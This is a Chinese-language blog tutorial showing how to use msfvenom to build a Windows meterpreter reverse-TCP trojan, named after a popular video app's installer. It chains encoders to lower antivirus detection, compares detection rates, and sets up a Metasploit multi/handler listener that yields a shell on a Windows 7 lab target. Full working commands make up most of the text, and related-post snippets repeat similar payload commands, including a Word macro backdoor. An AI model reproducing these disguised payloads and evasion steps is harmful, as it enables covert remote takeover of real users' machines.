利用Msfvenom获取WindowsShell

于 2024-07-18 09:17:04 发布
阅读量500 收藏 8
点赞数 4
分类专栏: kali渗透测试 文章标签: kali msfvenom 渗透测试
DoubleJing
本文链接:https://blog.youkuaiyun.com/qq_41944882/article/details/140511591
版权

一、在kali主机上利用msfvenom生成windows端的安装程序(exe文件),程序名最好取一个大家经常安装的程序,如腾讯视频、爱奇艺等。
(1)由于生成的程序可能会被杀毒软件识别,我们比较一下使用单个编码器生成的程序与用两个编码器生成的程序,哪个更容易被识别。

  1. 利用单个编码器
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /root/腾讯视频1.exe

其中LHOST是指kali主机的IP地址
在这里插入图片描述

msfvenom语法格式

选项:
--platform            指定平台
-l, --list            列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-p, --payload         选择一个需要生成的载荷(payload)
-f, --format          生成的文件格式
-e, --encoder         编码方式
-a, --arch            指定payload的目标架构(x86|x64|x86_64)
-o, --out             保存攻击payload
-b, --bad-chars       避免使用的字符 例如:不使用 ‘\x00\xff’
-n, --nopsled         提前给载荷(payload)设置一个长度为length的nopsled
-s, --space           产生有效载荷的长度
-i, --iterations      对载荷进行编码的次数
-c, --add-code        特别添加一个额外的win32外壳代码文件
-x, --template        指定要用作模板的自定义可执行文件(木马捆绑)
-k, --keep            保留模板行为并将有效载载作为新线程注入
-v, --var-name        为特定的输出格式指定一个自定义变量名
    --shellest        最小化生成payload
-t, --timeout         从STDIN读取有效负载时要等待的秒数
-h, --help            帮助  
    --help-formats    查看msf支持的输出格式列表
  1. 利用两种编码器组合编码
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /root/腾讯视频2.exe

在这里插入图片描述
二、将生成的两个exe文件下载到物理机,使用ssh客户端连接kali主机,利用sz工具下载两个exe文件。
安装sz工具

┌──(root?kali)-[~]
└─# apt-get install lrzsz

┌──(root?kali)-[~]
└─# sz 腾讯视频*

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
三、利用在线检测工具检测程序
在这里插入图片描述
在这里插入图片描述
可以看出利用两种编码器混合编码的检出率比单一编码器编码低

四、在kali主机上启动msfvenom开始监听
在这里插入图片描述

┌──(root?kali)-[~]
└─# msfdb run

在这里插入图片描述

msf6 > use exploit/multi/handler

在这里插入图片描述

msf6 exploit(multi/handler) > show options

在这里插入图片描述

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

msf6 exploit(multi/handler) > set lhost 192.168.137.130

在这里插入图片描述

msf6 exploit(multi/handler) > run

在这里插入图片描述
五、在win7靶机上运行腾讯视频1.exe文件
六、查看是否建立连接
在这里插入图片描述
此时我们已经获取到主机地址为192.168.137.133的shell,我们可以利用dos命令进行相应的操作。
在这里插入图片描述
在这里插入图片描述

使用msfvenom获取windows shell
赴前尘
06-26 816
使用msfvenom获取windows shell
Msfvenom制作自己的专属Shell
最新发布
Liu_Bruce的博客
07-09 336
如何通过Msfvenom来生成用户自己的专属Shell?有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀。
msfvenom生成shell
向阳-Y.的博客
03-06 516
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
msf爆破Tomcat并获取shell
m0_50841600的博客
09-20 433
msf爆破Tomcat并获取shell
msfconsole之制作windows木马并成功获取shell(正向payload)
2201_75387456的博客
05-27 1256
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机中打开,利用netstat -ano查看打开的端口。
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4832
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
利用宏感染 word 文档获取windows系统的 shell
Cwillchris的博客
05-27 471
利用宏感染 word 文档获取window的 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) office 2016 实验步骤: 1、生成后门 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 3422
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
msfvenom 生成shellcode
nethm的专栏
09-20 7989
先来看下msfvenomd的帮助 root@localhost:~# msfvenom -h Error: MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] O
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1229
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1193
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
msfconsole之制作windows木马并成功获取shell(反向payload)
2201_75387456的博客
05-27 866
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
MSF基于JAVA的漏洞获取shell实战
永远是少年
06-13 820
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 2122
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
msfvenom生成shellcode
nethm的专栏
09-20 1499
Framework Payloads (437 total) ============================== Name Description ---- -----------
木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器
探测???
12-07 517
Shellcode是一段用于利用软件漏洞而执行的代码,通常以16进制机器码形式编写,因为它经常让攻击者获得shell的名称[1]。Shellcode的主要目的是让攻击者的恶意代码在受害者的计算机上执行,从而实现对系统的控制或数据的修改、窃取或上传等目的。Shellcode的内容通常是一段可以在受害者的计算机上执行的机器代码,用于实现攻击者的目标。这段代码可以是出于恶作剧目的弹出一个消息框,也可以出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行,甚至是出于破坏目的格式化硬盘等。
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 1245
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
msf生成的shellcode分析--走,组团分析shellcode呀
m0_64973256的博客
05-11 1080
作者丨selph 分析MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"的这个payload,本着一定要知道利用代码是怎么运行的想法,开始对该shellcode的详细分析。 实验环境 •虚拟机:Kali Linux 2022.1 x64 •物理机:Windows 10 21H2 家庭版 •软件:x86...
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
使用Metasploit生成木马获取Windows控制权实验
"该实验是关于网络攻防的实践,主要使用Metasploit框架来生成木马,以获取Windows系统的远程控制权。实验环境包括Windows 10操作系统和Kali Linux虚拟机,其中Kali Linux作为攻击机,利用内置的msfvenom工具创建木马...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

DataGiant

您的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值